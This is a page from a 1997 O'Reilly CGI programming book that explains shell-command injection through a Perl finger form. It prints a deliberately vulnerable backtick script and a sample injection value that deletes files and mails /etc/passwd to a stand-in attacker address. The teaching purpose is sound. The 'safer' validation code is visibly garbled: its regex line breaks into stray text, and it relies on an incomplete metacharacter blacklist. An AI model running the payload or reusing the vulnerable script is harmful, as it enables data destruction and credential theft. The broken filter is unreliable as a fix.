<!DOCTYPE HTML PUBLIC "-//ORA//DTD CD HTML 3.2//EN">
<HTML>
<HEAD>
<TITLE>[Chapter 7] 7.4 Security</TITLE>
<META NAME="author" CONTENT="Shishir Gundavaram">
<META NAME="date" CONTENT="Tue Aug 26 16:38:22 1997">
<META NAME="form" CONTENT="html">
<META NAME="metadata" CONTENT="dublincore.0.1">
<META NAME="objecttype" CONTENT="book part">
<META NAME="otheragent" CONTENT="gmat dbtohtml">
<META NAME="publisher" CONTENT="O'Reilly &amp; Associates, Inc.">
<META NAME="source" CONTENT="SGML">
<META NAME="subject" CONTENT="cgi programming">
<META NAME="title" CONTENT="CGI Programming on the World Wide Web">
<META HTTP-EQUIV="Content-Script-Type" CONTENT="text/javascript">
</HEAD>
<BODY BGCOLOR="#FFFFFF">

<DIV CLASS=htmlnav>
<H1><a href='index.html'><IMG SRC="gifs/smbanner.gif"
     ALT="CGI Programming on the World Wide Web" border=0></a></H1>
<table width=515 border=0 cellpadding=0 cellspacing=0>
<tr>
<td width=172 align=left valign=top><A HREF="ch07_03.html"><IMG SRC="gifs/txtpreva.gif" ALT="Previous" border=0></A></td>
<td width=171 align=center valign=top><B><FONT FACE="ARIEL,HELVETICA,HELV,SANSERIF" SIZE="-1">Chapter 7<br>Advanced Form Applications</FONT></B></TD>
<td width=172 align=right valign=top><A HREF="ch08_01.html"><IMG SRC="gifs/txtnexta.gif" ALT="Next" border=0></A></td>
</tr>
</table>

&nbsp;
<hr align=left width=515>
</DIV>
<DIV CLASS=sect1>
<h2 CLASS=sect1><A CLASS="TITLE" NAME="CGI-CHP-7-SECT-4">7.4 Security</A></h2>

<P CLASS=para>
When dealing
with forms, it is extremely critical to check the data. A malicious
user can embed shell metacharacters--characters that have special
meaning to the shell--in the form data. For example, here is a form
that asks for user name:

<DIV CLASS=screen>
<P>
<PRE>
&lt;FORM ACTION="/cgi-bin/finger.pl" METHOD="POST"&gt;
&lt;INPUT TYPE="text" NAME="user" SIZE=40&gt;
&lt;INPUT TYPE="submit" VALUE="Get Information"&gt;
&lt;/FORM&gt;
</PRE>
</DIV>

<P CLASS=para>
Here is the program to handle the form:

<DIV CLASS=screen>
<P>
<PRE>
#!/usr/local/bin/perl
&amp;parse_form_data(*simple);
$user = $simple{'user'};
</PRE>
</DIV>

<P CLASS=para>
The <I CLASS=emphasis>parse_form_data</I>
subroutine is the same as the one we've been using throughout the
book.

<DIV CLASS=screen>
<P>
<PRE>
print "Content-type: text/plain", "\n\n";
print "Here are the results of your query: ", "\n";
print `/usr/local/bin/finger $user`;
</PRE>
</DIV>

<P CLASS=para>
In Perl, you
can execute shell commands by using the `<I CLASS=emphasis>command</I>
` notation. In this case, the <I CLASS=emphasis>finger</I>
command is executed with the information specified by the user.

<DIV CLASS=screen>
<P>
<PRE>
print "\n";
exit (0);
</PRE>
</DIV>

<P CLASS=para>
This is an extremely dangerous program! Do not use it! Imagine
if a malicious user entered the following as the value of <I CLASS=emphasis>user</I>:

<DIV CLASS=screen>
<P>
<PRE>
; rm * ; mail -s "Ha Ha" malicious@crack.net &lt; /etc/passwd
</PRE>
</DIV>

<P CLASS=para>
This would not only remove all
the files in the current directory, but it would also mail the
 <I CLASS=emphasis>/etc/passwd</I> file on your system to the malicious user. In order to
avoid this type of problem, you should check the form value before
placing it on the command line. Here is the modification of the
previous program:

<DIV CLASS=screen>
<P>
<PRE>
#!/usr/local/bin/perl
&amp;parse_form_data(*simple);
$user = $simple{'user'};
if ($user =~ /[;&gt;&lt;&amp;\*`\]/) {\n    [amp   ]\|return_error (500, "CGI Program Alert", "What are you trying to do?");
} else {
    print "Content-type: text/plain", "\n\n";
    print "Here are the results of your query: ", "\n";
    print `/usr/local/bin/finger $user`;
    print "\n";
}
exit (0);
</PRE>
</DIV>

<P CLASS=para>
In this safer version, the user information
is checked for the following metacharacters:

<DIV CLASS=screen>
<P>
<PRE>
; &gt; &lt; &amp; * ` |
</PRE>
</DIV>

<P CLASS=para>
If the
information contains any one of these characters, a serious error
is returned. Otherwise, the program returns the information from
the <I CLASS=emphasis>finger</I> command.

<P CLASS=para>
</DIV>


<DIV CLASS=htmlnav>

<P>
<HR align=left width=515>
<table width=515 border=0 cellpadding=0 cellspacing=0>
<tr>
<td width=172 align=left valign=top><A HREF="ch07_03.html"><IMG SRC="gifs/txtpreva.gif" ALT="Previous" border=0></A></td>
<td width=171 align=center valign=top><a href="index.html"><img src='gifs/txthome.gif' border=0 alt='Home'></a></td>
<td width=172 align=right valign=top><A HREF="ch08_01.html"><IMG SRC="gifs/txtnexta.gif" ALT="Next" border=0></A></td>
</tr>
<tr>
<td width=172 align=left valign=top>Quiz/Test Form Application</td>
<td width=171 align=center valign=top><a href="index/idx_0.html"><img src='gifs/index.gif' alt='Book Index' border=0></a></td>
<td width=172 align=right valign=top>Multiple Form Interaction</td>
</tr>
</table>
<hr align=left width=515>

<IMG SRC="gifs/smnavbar.gif" USEMAP="#map" BORDER=0> 
<MAP NAME="map"> 
<AREA Shape="Rect" coords = "0,0,45,20"  HREF="../html/index.html"
alt="HTML: The Definitive Guide">
<AREA Shape="Rect" coords = "46,0,164,37"  HREF="index.html"
alt="CGI Programming">
<AREA Shape="Rect" coords = "163,0,248,32"  HREF="../jscript/index.html"
alt="JavaScript: The Definitive Guide">
<AREA Shape="Rect" coords = "247,0,371,44"  HREF="../perl/index.html" 
alt="Programming Perl">
<AREA Shape="Rect" coords = "371,0,524,46"  HREF="../webnut/index.html" 
alt="WebMaster in a Nutshell">
</MAP>
</DIV>

</BODY>
</HTML>
